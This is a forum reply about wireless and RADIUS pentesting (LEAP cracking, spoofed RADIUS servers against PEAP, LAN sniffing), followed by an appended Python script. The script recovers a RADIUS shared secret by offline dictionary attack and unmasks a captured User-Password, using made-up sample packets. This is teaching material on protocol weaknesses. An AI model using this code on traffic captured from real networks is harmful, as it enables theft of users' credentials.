PEAP and EAP-TLS on Server 2008 and Cisco WLC

Hi Francisco,

You are welcome. Wireless pentesting is pretty fun and a good method to learn more about wireless. There are a couple of RADIUS related attacks that you can do from the wireless side.

The first one you might want to try is LEAP as it is vulnerable to offline dictionary / brute-force techniques. We don’t use LEAP anymore in the field…

PEAP is also fun; the wireless client only has to authenticate the RADIUS server, so it’s possible to spoof it. When the client sees the certificate of the fake RADIUS server, it has to decide whether to accept the certificate or not… if it does, you get some authentication information you can use for offline attacks.

Bypassing the RADIUS server from the wireless side isn’t possible (as far as I know)… maybe you can mess with it from the LAN side with a MITM attack, but I haven’t tried that before. RADIUS doesn’t encrypt everything, so on the LAN you might be able to sniff usernames and some other information.

TACACS+ encrypts everything, so it is more secure. I think that RADIUS, however, is still more popular… I see more RADIUS servers than TACACS+ in the field.

You might enjoy this book:

It covers most of the wireless attacks using BackTrack or Kali.

Rene
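As an added example (not part of Rene's reply or any tool it mentions), the script below builds a RADIUS Access-Request/Access-Accept pair and then processes it the way a sniffer on the LAN side would. It shows why "RADIUS doesn't encrypt everything": the User-Name attribute travels in the clear, the User-Password attribute is only masked by XOR with MD5(shared secret || Request Authenticator) as specified in RFC 2865, and the Response Authenticator of the Access-Accept lets an attacker test candidate shared secrets offline and, once one matches, unmask the password. The packets, shared secret, username, password and wordlist are all constructed for the example.

```python
"""Added example: what a LAN-side sniffer sees in a RADIUS exchange (RFC 2865).

Constructed packets and values; nothing here comes from the original post.
"""
import hashlib
import struct

ATTR_USER_NAME = 1
ATTR_USER_PASSWORD = 2
CODE_ACCESS_REQUEST = 1
CODE_ACCESS_ACCEPT = 2


def hide_password(password: bytes, secret: bytes, request_auth: bytes) -> bytes:
    """RFC 2865 section 5.2: pad to 16 bytes, XOR each block with
    MD5(secret || previous block); the first block uses the Request Authenticator."""
    padded = password + b"\x00" * (-len(password) % 16)
    hidden, prev = b"", request_auth
    for i in range(0, len(padded), 16):
        key = hashlib.md5(secret + prev).digest()
        block = bytes(p ^ k for p, k in zip(padded[i:i + 16], key))
        hidden += block
        prev = block
    return hidden


def reveal_password(hidden: bytes, secret: bytes, request_auth: bytes) -> bytes:
    """Inverse of hide_password: anyone holding the shared secret can unmask it."""
    clear, prev = b"", request_auth
    for i in range(0, len(hidden), 16):
        key = hashlib.md5(secret + prev).digest()
        clear += bytes(c ^ k for c, k in zip(hidden[i:i + 16], key))
        prev = hidden[i:i + 16]
    return clear.rstrip(b"\x00")


def _encode_attrs(attrs) -> bytes:
    # Each attribute is Type (1 byte), Length (1 byte, includes the header), Value.
    return b"".join(struct.pack("!BB", t, 2 + len(v)) + v for t, v in attrs)


def parse_packet(packet: bytes):
    """Return (code, identifier, length, authenticator, [(type, value), ...])."""
    code, identifier, length = struct.unpack("!BBH", packet[:4])
    authenticator = packet[4:20]
    attrs, pos = [], 20
    while pos < length:
        t, l = packet[pos], packet[pos + 1]
        if l < 2 or pos + l > length:
            raise ValueError("malformed RADIUS attribute")
        attrs.append((t, packet[pos + 2:pos + l]))
        pos += l
    return code, identifier, length, authenticator, attrs


def build_access_request(username, password, secret, request_auth, identifier=7):
    body = _encode_attrs([(ATTR_USER_NAME, username),
                          (ATTR_USER_PASSWORD, hide_password(password, secret, request_auth))])
    return struct.pack("!BBH", CODE_ACCESS_REQUEST, identifier, 20 + len(body)) + request_auth + body


def build_access_accept(request: bytes, secret: bytes, attrs=()):
    """RFC 2865 section 3: Response Authenticator =
    MD5(Code + ID + Length + RequestAuth + Attributes + Secret)."""
    _, identifier, _, request_auth, _ = parse_packet(request)
    body = _encode_attrs(attrs)
    header = struct.pack("!BBH", CODE_ACCESS_ACCEPT, identifier, 20 + len(body))
    response_auth = hashlib.md5(header + request_auth + body + secret).digest()
    return header + response_auth + body


def recover_shared_secret(request: bytes, response: bytes, wordlist):
    """Offline dictionary attack on the shared secret: recompute the Response
    Authenticator for each candidate and compare with the captured one."""
    _, _, _, request_auth, _ = parse_packet(request)
    code, identifier, length, response_auth, _ = parse_packet(response)
    header = struct.pack("!BBH", code, identifier, length)
    body = response[20:length]
    for candidate in wordlist:
        if hashlib.md5(header + request_auth + body + candidate).digest() == response_auth:
            return candidate
    return None


def sniff_credentials(request: bytes, response: bytes, wordlist):
    """What a sniffer between NAS and RADIUS server learns from one exchange."""
    _, _, _, request_auth, attrs = parse_packet(request)
    fields = dict(attrs)
    username = fields.get(ATTR_USER_NAME, b"").decode(errors="replace")  # always cleartext
    secret = recover_shared_secret(request, response, wordlist)
    password = None
    if secret is not None and ATTR_USER_PASSWORD in fields:
        password = reveal_password(fields[ATTR_USER_PASSWORD], secret, request_auth).decode(errors="replace")
    return {"username": username, "secret": secret, "password": password}


# Constructed sample capture (assumed values, made up for this example).
SECRET = b"testing123"
REQUEST_AUTH = bytes(range(16))
REQUEST = build_access_request(b"francisco", b"Winter2024!", SECRET, REQUEST_AUTH)
RESPONSE = build_access_accept(REQUEST, SECRET)
WORDLIST = [b"radius", b"password", b"testing123", b"secret"]

if __name__ == "__main__":
    print(sniff_credentials(REQUEST, RESPONSE, WORDLIST))
```

The username is readable without any secret at all; the password and the secret fall only to the dictionary step, which is why a weak RADIUS shared secret on an unencrypted LAN segment is the practical weakness here. PEAP/EAP-TLS change this picture only inside the EAP tunnel; the RADIUS attributes around it are still just RFC 2865 packets.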